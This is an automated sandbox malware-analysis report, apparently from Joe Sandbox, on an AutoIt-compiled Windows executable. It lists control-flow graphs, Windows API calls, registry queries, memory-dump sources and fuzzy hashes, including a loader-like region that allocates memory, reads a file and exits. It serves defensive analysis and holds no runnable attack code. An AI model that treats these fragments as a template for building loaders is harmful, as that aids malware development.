                                                                                                                                                                                                                                                      control_flow_graph 1234 eeacb3-eeace0 call ee6ac0 call ee7cf4 call ee6986 1241 eeacfd-eead02 1234->1241 1242 eeace2-eeacf8 call eee880 1234->1242 1243 eead08-eead0f 1241->1243 1248 eeaf52-eeaf57 call ee6b05 1242->1248 1245 eead42-eead51 GetStartupInfoW 1243->1245 1246 eead11-eead40 1243->1246 1249 eead57-eead5c 1245->1249 1250 eeae80-eeae86 1245->1250 1246->1243 1249->1250 1252 eead62-eead79 1249->1252 1253 eeae8c-eeae9d 1250->1253 1254 eeaf44-eeaf50 call eeaf58 1250->1254 1256 eead7b-eead7d 1252->1256 1257 eead80-eead83 1252->1257 1258 eeae9f-eeaea2 1253->1258 1259 eeaeb2-eeaeb8 1253->1259 1254->1248 1256->1257 1264 eead86-eead8c 1257->1264 1258->1259 1265 eeaea4-eeaead 1258->1265 1261 eeaebf-eeaec6 1259->1261 1262 eeaeba-eeaebd 1259->1262 1266 eeaec9-eeaed5 GetStdHandle 1261->1266 1262->1266 1267 eeadae-eeadb6 1264->1267 1268 eead8e-eead9f call ee6986 1264->1268 1269 eeaf3e-eeaf3f 1265->1269 1270 eeaf1c-eeaf32 1266->1270 1271 eeaed7-eeaed9 1266->1271 1273 eeadb9-eeadbb 1267->1273 1281 eeada5-eeadab 1268->1281 1282 eeae33-eeae3a 1268->1282 1269->1250 1270->1269 1276 eeaf34-eeaf37 1270->1276 1271->1270 1274 eeaedb-eeaee4 GetFileType 1271->1274 1273->1250 1277 eeadc1-eeadc6 1273->1277 1274->1270 1280 eeaee6-eeaef0 1274->1280 1276->1269 1278 eeadc8-eeadcb 1277->1278 1279 eeae20-eeae31 1277->1279 1278->1279 1283 eeadcd-eeadd1 1278->1283 1279->1273 1284 eeaefa-eeaefd 1280->1284 1285 eeaef2-eeaef8 1280->1285 1281->1267 1286 eeae40-eeae4e 1282->1286 1283->1279 1287 eeadd3-eeadd5 1283->1287 1289 eeaeff-eeaf03 1284->1289 1290 eeaf08-eeaf1a InitializeCriticalSectionAndSpinCount 1284->1290 1288 eeaf05 1285->1288 1291 eeae74-eeae7b 1286->1291 1292 eeae50-eeae72 1286->1292 1293 eeadd7-eeade3 GetFileType 1287->1293 1294 eeade5-eeae1a InitializeCriticalSectionAndSpinCount 1287->1294 1288->1290 1289->1288 1290->1269 1291->1264 1292->1286 1293->1294 1295 eeae1d 1293->1295 1294->1295 1295->1279
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00EEACC1
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7CF4: __mtinitlocknum.LIBCMT ref: 00EE7D06
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7CF4: EnterCriticalSection.KERNEL32(00000000,?,00EE7ADD,0000000D), ref: 00EE7D1F
                                                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00EEACD2
                                                                                                                                                                                                                                                        • Part of subcall function 00EE6986: __calloc_impl.LIBCMT ref: 00EE6995
                                                                                                                                                                                                                                                        • Part of subcall function 00EE6986: Sleep.KERNEL32(00000000,000003BC,00EDF507,?,0000000E), ref: 00EE69AC
                                                                                                                                                                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00EEACED
                                                                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,00F76E28,00000064,00EE5E91,00F76C70,00000014), ref: 00EEAD46
                                                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00EEAD91
                                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000001), ref: 00EEADD8
                                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00EEAE11
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1426640281-0
                                                                                                                                                                                                                                                      • Opcode ID: c8143887be4cb337469dac352309ac8b1dc58a14cd46525a29859213049f5d8f
                                                                                                                                                                                                                                                      • Instruction ID: aff07e44610c29b16572af9e3147a61240b5170fbb1621e531ed45980e8f0a02
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8143887be4cb337469dac352309ac8b1dc58a14cd46525a29859213049f5d8f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E181177190178D8FDB24CF69C8805ADBBF0AF15324B28526DD4A6BB3E1C734A843DB52

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1296 116de30-116dede call 116b830 1299 116dee5-116df0b call 116ed40 CreateFileW 1296->1299 1302 116df12-116df22 1299->1302 1303 116df0d 1299->1303 1308 116df24 1302->1308 1309 116df29-116df43 VirtualAlloc 1302->1309 1304 116e05d-116e061 1303->1304 1306 116e0a3-116e0a6 1304->1306 1307 116e063-116e067 1304->1307 1310 116e0a9-116e0b0 1306->1310 1311 116e073-116e077 1307->1311 1312 116e069-116e06c 1307->1312 1308->1304 1315 116df45 1309->1315 1316 116df4a-116df61 ReadFile 1309->1316 1317 116e105-116e11a 1310->1317 1318 116e0b2-116e0bd 1310->1318 1313 116e087-116e08b 1311->1313 1314 116e079-116e083 1311->1314 1312->1311 1321 116e08d-116e097 1313->1321 1322 116e09b 1313->1322 1314->1313 1315->1304 1323 116df63 1316->1323 1324 116df68-116dfa8 VirtualAlloc 1316->1324 1319 116e11c-116e127 VirtualFree 1317->1319 1320 116e12a-116e132 1317->1320 1325 116e0c1-116e0cd 1318->1325 1326 116e0bf 1318->1326 1319->1320 1321->1322 1322->1306 1323->1304 1327 116dfaf-116dfca call 116ef90 1324->1327 1328 116dfaa 1324->1328 1329 116e0e1-116e0ed 1325->1329 1330 116e0cf-116e0df 1325->1330 1326->1317 1336 116dfd5-116dfdf 1327->1336 1328->1304 1331 116e0ef-116e0f8 1329->1331 1332 116e0fa-116e100 1329->1332 1334 116e103 1330->1334 1331->1334 1332->1334 1334->1310 1337 116e012-116e026 call 116eda0 1336->1337 1338 116dfe1-116e010 call 116ef90 1336->1338 1344 116e02a-116e02e 1337->1344 1345 116e028 1337->1345 1338->1336 1346 116e030-116e034 CloseHandle 1344->1346 1347 116e03a-116e03e 1344->1347 1345->1304 1346->1347 1348 116e040-116e04b VirtualFree 1347->1348 1349 116e04e-116e057 1347->1349 1348->1349 1349->1299 1349->1304
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0116DF01
                                                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0116E127
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_116b000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 204039940-0
                                                                                                                                                                                                                                                      • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                                                                                                                                                                      • Instruction ID: 829f0b8ad1007e72e6d782a442eb4605839c1e39fd59028da5b779b275c1088f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EA11A74E01209EBDF18CFA4C994BEEBBB9BF48304F208659E501BB280D7769A51CF55

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1405 ec49fb-ec4a25 call ecbcce RegOpenKeyExW 1408 ec4a2b-ec4a2f 1405->1408 1409 f341cc-f341e3 RegQueryValueExW 1405->1409 1410 f34246-f3424f RegCloseKey 1409->1410 1411 f341e5-f34222 call edf4ea call ec47b7 RegQueryValueExW 1409->1411 1416 f34224-f3423b call ec6a63 1411->1416 1417 f3423d-f34245 call ec47e2 1411->1417 1416->1417 1417->1410
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00EC4A1D
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F341DB
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F3421A
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00F34249
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                                                                                                      • API String ID: 1586453840-614718249
                                                                                                                                                                                                                                                      • Opcode ID: f22778e9e6752633f69c04596d99f39979d75069beddc945278d106eb2785c7e
                                                                                                                                                                                                                                                      • Instruction ID: 543864e479f1812e9a78479ad3e288b06463df0576cfdb84ce6e1afcf3939b47
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f22778e9e6752633f69c04596d99f39979d75069beddc945278d106eb2785c7e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6119075A01108BEDB10EBA8CD86EAF7BACEF15354F001059B506E3191EA71AE02E710

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1432 ec36b8-ec3728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EC36E6
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC3707
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,00EC3AA3,?), ref: 00EC371B
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,00EC3AA3,?), ref: 00EC3724
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                      • Opcode ID: 5096ce26bf0291a708c2a09848018e603c5177b45d675ebf64f1c22616558e5f
                                                                                                                                                                                                                                                      • Instruction ID: ddf1f264fe0e3e175c9fb3aba20e453c9d503eb92889c31ead36a329ff6506ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5096ce26bf0291a708c2a09848018e603c5177b45d675ebf64f1c22616558e5f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71F03A745402D87AE7315757AC08EB73E7DE7C7F20B00011ABA04E21B1C1650886FBB1

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1537 116dbe0-116dd29 call 116b830 call 116dad0 CreateFileW 1544 116dd30-116dd40 1537->1544 1545 116dd2b 1537->1545 1548 116dd47-116dd61 VirtualAlloc 1544->1548 1549 116dd42 1544->1549 1546 116dde0-116dde5 1545->1546 1550 116dd65-116dd7c ReadFile 1548->1550 1551 116dd63 1548->1551 1549->1546 1552 116dd80-116ddba call 116db10 call 116cad0 1550->1552 1553 116dd7e 1550->1553 1551->1546 1558 116ddd6-116ddde ExitProcess 1552->1558 1559 116ddbc-116ddd1 call 116db60 1552->1559 1553->1546 1558->1546 1559->1558
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0116DAD0: Sleep.KERNELBASE(000001F4), ref: 0116DAE1
                                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0116DD1F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_116b000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateFileSleep
                                                                                                                                                                                                                                                      • String ID: WSYJ4T6SN1NSIWMPZMS
                                                                                                                                                                                                                                                      • API String ID: 2694422964-1721998372
                                                                                                                                                                                                                                                      • Opcode ID: a39448f628a229565429e2e8042730ccf0f803d486f6982b604da38572d1b205
                                                                                                                                                                                                                                                      • Instruction ID: 96f0bed32ab8bc737c0b451e3d922d7829f37f0130088242c6242005c10bb25b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a39448f628a229565429e2e8042730ccf0f803d486f6982b604da38572d1b205
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7519430E04248DBEF15DBE4D854BEEBB79AF18704F004199E249BB2C1D7BA1B44CBA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EC522F
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00EC5283
                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EC5293
                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F33CB0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                                                                                                                                                      • String ID: Line:
                                                                                                                                                                                                                                                      • API String ID: 1053898822-1585850449
                                                                                                                                                                                                                                                      • Opcode ID: 928e536d94532156406a0fe54a95ee95426429650ab77ed4b1fc8f8947527f38
                                                                                                                                                                                                                                                      • Instruction ID: 8f929fd40925090fadf9d903c7c7b9c9cdc450e50ffa96c2af5a88f33367d0ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 928e536d94532156406a0fe54a95ee95426429650ab77ed4b1fc8f8947527f38
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A431B272408744AFC324EB50ED46FEB77ECAF44310F00561EF599A21A1DB71A68A9B92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EC39FE,?,00000001), ref: 00EC41DB
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F336B7
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F336FE
                                                                                                                                                                                                                                                        • Part of subcall function 00ECC833: __wsplitpath.LIBCMT ref: 00ECC93E
                                                                                                                                                                                                                                                        • Part of subcall function 00ECC833: _wcscpy.LIBCMT ref: 00ECC953
                                                                                                                                                                                                                                                        • Part of subcall function 00ECC833: _wcscat.LIBCMT ref: 00ECC968
                                                                                                                                                                                                                                                        • Part of subcall function 00ECC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00ECC978
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                                                                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                                                                                                                      • API String ID: 805182592-1757145024
                                                                                                                                                                                                                                                      • Opcode ID: 182a4ffac5602f4be5c256345794678b90f857f278efb049b2307930941ba835
                                                                                                                                                                                                                                                      • Instruction ID: 5feb193a17d0f06833eff7995f5d235cb7b5d277f7c133247cbdbd08c824cce9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 182a4ffac5602f4be5c256345794678b90f857f278efb049b2307930941ba835
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA915F71910219AFCF04EFA4CD52EEDB7B4BF08320F14442AF816BB291DB75AA55DB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F81148,?,00EC61FF,?,00000000,00000001,00000000), ref: 00EC5392
                                                                                                                                                                                                                                                        • Part of subcall function 00EC49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00EC4A1D
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F32D80
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F32DB5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscat$FileModuleNameOpen
                                                                                                                                                                                                                                                      • String ID: \$\Include\
                                                                                                                                                                                                                                                      • API String ID: 3592542968-2640467822
                                                                                                                                                                                                                                                      • Opcode ID: 5193286e04657cb406638120fff0893393bda685f9157b32cf650ad518f38b42
                                                                                                                                                                                                                                                      • Instruction ID: d20953e59a451694eeb9e06c483fe4187e88051d11c2e55689f4f315520f6d99
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5193286e04657cb406638120fff0893393bda685f9157b32cf650ad518f38b42
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D51D4724047448FC794EF55DE899EAB3F4FF49310B60192EF648A3261DB31A909EB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __getstream.LIBCMT ref: 00EE34FE
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00EE3539
                                                                                                                                                                                                                                                      • __wopenfile.LIBCMT ref: 00EE3549
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                                                                                                                      • String ID: <G
                                                                                                                                                                                                                                                      • API String ID: 1820251861-2138716496
                                                                                                                                                                                                                                                      • Opcode ID: 8697e223e7b7548fcbff8bc0da0279dea9b6eb54d2f943229888057aaca2cb2a
                                                                                                                                                                                                                                                      • Instruction ID: ef7a447a4b35a8e17ce0ee6f8f008c13222ecce0edafec82b734da17a7c1ccd7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8697e223e7b7548fcbff8bc0da0279dea9b6eb54d2f943229888057aaca2cb2a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1110A70A0038E9FDB21BF778C4266E76E4AF45350F159425E429FB2C5EB30CA0197A2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EDD28B,SwapMouseButtons,00000004,?), ref: 00EDD2BC
                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00EDD28B,SwapMouseButtons,00000004,?,?,?,?,00EDC865), ref: 00EDD2DD
                                                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00EDD28B,SwapMouseButtons,00000004,?,?,?,?,00EDC865), ref: 00EDD2FF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
